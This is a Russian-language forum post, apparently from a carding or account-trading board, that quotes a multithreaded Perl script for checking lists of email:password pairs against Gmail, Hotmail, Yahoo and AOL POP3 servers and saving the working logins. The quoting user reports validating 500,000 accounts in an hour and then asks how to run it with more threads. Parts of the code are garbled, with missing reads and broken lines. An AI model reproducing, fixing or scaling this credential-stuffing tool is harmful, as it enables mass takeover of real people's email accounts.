Показать сообщение отдельно

  #19  
Старый 07.02.2014, 22:49
dumpersteam
Новичок
Регистрация: 09.09.2013
Сообщений: 16
С нами: 6671126

Репутация: 0
По умолчанию

Цитата:
Сообщение от Serrg  
Прочекать смысле на валидность ? если да то у меня завалялся чекер на perl очень шустрый без прокси, очень давно где то его брал уже не помню и автора тоже не помню.
У меня чекает в 300 потоков максимум, 1000 аков в за 7 секунд.
Когда сижу с usb modema то ставлю в 50 потоков и шустро работает и гуды не пропускает, вот сам код:
Код:
use warnings;
use strict;

use threads;
use threads::shared;

use IO::Socket;
use IO::Socket::SSL;

use Fcntl ':flock';

### Настройки

my $accounts_file = 'ac.txt'; # Файл с аккаунтами
my $accounts_delimiter = ':'; # Разделитель логина и пароля
my $good_file = 'good.txt';
my $bad_file = 'bad.txt';
my $log_bad = 1;
my $timeout = 60;
my $threads_count = 10; # Количество потоков

### ---------

my %servers = (
'gmail.com' => {
'port' => 995, 
'ssl' => 1,
'login_email' => 1
},
'hotmail.com' => {
'host' => 'pop3.live.com', 
'port' => 995, 
'ssl' => 1,
'login_email' => 1
},
'yahoo.com' => {
'host' => 'plus.pop.mail.yahoo.com',
'port' => 995, 
'ssl' => 1
},
'aol.com' => {
'port' => 995, 
'ssl' => 1,
'login_email' => 1
}
);

my %statictis : shared = ('good' => 0, 'bad' => 0, 'error' => 0);
my @threads = ();

$| = 1;

my @accounts : shared;
(open FH, ';
close FH;

open FH, '>', $good_file;
close FH;

if ($log_bad) {
open FH, '>', $bad_file;
close FH;
}

sub thread_print {
my ($str) = "@_ [thread ".threads->tid()."]";
$str .= " " x (78 - length $str) if length $str list() + 1)."]\r";
}

sub check_account {
while (1) {
last if !@accounts;
my $account = lc shift @accounts;
chomp $account;
if ($account =~ /([^@]+)@([^$accounts_delimiter]+)$accounts_delimiter(.+)/) {
my ($login, $host, $password) = ($1, $2, $3);
my $r_login = $login;
my $sock;	
if ($servers{$host}) {
$r_login = "$login\@$host" if ${$servers{$host}}{'login_email'};
if (${$servers{$host}}{'ssl'}) {
eval { $sock = IO::Socket::SSL->new(PeerAddr => ((${$servers{$host}}{'host'}) ? ${$servers{$host}}{'host'} : "pop.$host"), Proto => 'tcp', PeerPort => ((${$servers{$host}}{'port'}) ? ${$servers{$host}}{'port'} : 110), Timeout => $timeout); };
} else {
eval { $sock = IO::Socket::INET->new(PeerAddr => ((${$servers{$host}}{'host'}) ? ${$servers{$host}}{'host'} : "pop.$host"), Proto => 'tcp', PeerPort => ((${$servers{$host}}{'port'}) ? ${$servers{$host}}{'port'} : 110), Timeout => $timeout); };
}
} else {
eval{ $sock = IO::Socket::INET->new(PeerAddr => "pop.$host", Proto => 'tcp', PeerPort => 110, Timeout => $timeout);	};
}
if ($sock) {
$sock->autoflush(1);
my $answ;
$answ = ;
my $bad = 1; 
if ($answ && substr($answ, 0, 1) eq '+') { 
print $sock "USER $r_login\n"; 
$answ = ;
if ($answ && substr($answ, 0, 1) eq '+') { 
print $sock "PASS $password\n";
$answ = ;
if ($answ && substr($answ, 0, 1) eq '+') {
print $sock "QUIT\n"; 
close $sock;
$bad = 0;
thread_print "[+] $login\@$host$accounts_delimiter$password"; 
{ lock %statictis; $statictis{'good'}++; } 
open FH, '>>', $good_file;
flock FH, LOCK_EX;
print FH "$login\@$host$accounts_delimiter$password\n";
flock FH, LOCK_UN;
close FH;
} elsif ($answ && $answ =~ /SYS\/PERM/) {
$bad = 0;
{ lock %statictis; $statictis{'error'}++; } 
thread_print "[~] $login\@$host$accounts_delimiter$password"; 
}
}
}
if ($bad) {
thread_print "[-] $login\@$host$accounts_delimiter$password"; 
{ lock %statictis; $statictis{'bad'}++; } 
if ($log_bad) {
open FH, '>>', $bad_file;
flock FH, LOCK_EX;
print FH "$login\@$host$accounts_delimiter$password\n";
flock FH, LOCK_UN;
close FH;
}
}
} else {
{ lock %statictis; $statictis{'error'}++; } 
thread_print "[E] $login\@$host$accounts_delimiter$password #$?: $!";
}
}
}
threads->exit->detach;
}

$threads_count = $#accounts if $#accounts create(\&check_account) for 0..$threads_count - 1;
$_->join for @threads;
my $str;
$str .= "[ $_ - $statictis{$_} ]" for keys %statictis;
Я им чекнул 500 тысяч акков за час в 300 потоков
Как ты его в 300 потоков запускал?

У меня выше 50 Perl закрывается с ошибкой. С чем это может быть связано?

Загрузка процессора и памяти сразу под 100% и вылетает.
 
Ответить с цитированием